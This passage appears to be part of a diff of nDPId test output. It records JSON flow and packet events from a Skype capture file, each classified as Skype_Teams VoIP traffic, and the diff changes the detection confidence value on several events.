{"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rI8AAEAR6\/\/AqAEiQTffHTLdnEoAK4\/BnIgC0n2YTtpud4yFT0SZ+E2i0ODhSKmWbVLKl+n0TQ0fOTc="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3NGcAAEAR+6bAqAEinTfrpjLdnE8AI+OWnIoCh50u5xbhS9toIKRfor72\/ZRTG\/Y\/lAII"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzhcAAEARLU\/AqAEib91NnzLdnEkALGRznIwCwyeMbMrdlUQ5AFonNJwRLd3E7Awg+gZSbquojb\/nyMcP"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4ZaYAAEARmVXAqAEib91KEjLdgQkAJLX6nI4C1Tkw7dXubJLsc4XN4Hhz+Cr0PORpW0nsUg=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -677,13 +677,13 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zvgAAEARklXAqAEiQAQXlzLdnF0AJqz9nJAC1zV5OvO9upQBsUXmJpF2nBcsF0HuRy8JJIUg"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rSQAAEARguHAqAEinTfrrDLdnGAAJdphnJIChjRH4yCKz81IO5fkX1qSeV8SZKk7yqqsiNY="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyo54AAEARi\/LAqAEi1cezmDLdnFcAHjAjnJQCZ2daOJDdnSgXIMa0IqUKO\/m6pw=="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="} @@ -694,10 +694,10 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoHIAAEARwNrAqAEiQAQXkTLdnFgALcyQnJYCZ5BZSWZ\/iXC28\/gJa4xy6SADRNB7IBe6OkY8K1Ib90nh6Q=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2TSkAAEARlefAqAEinTc4pTLdnFQAIg\/nnJgCnGl25qOBTIS5Gpv0M8FAGs9\/YbWac7o="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1431969690604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969690604,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWw53yBAwphOYnK6ASOJA8uAAAAgQFrAQCCApOpRObPiNGZAEDAwk="} 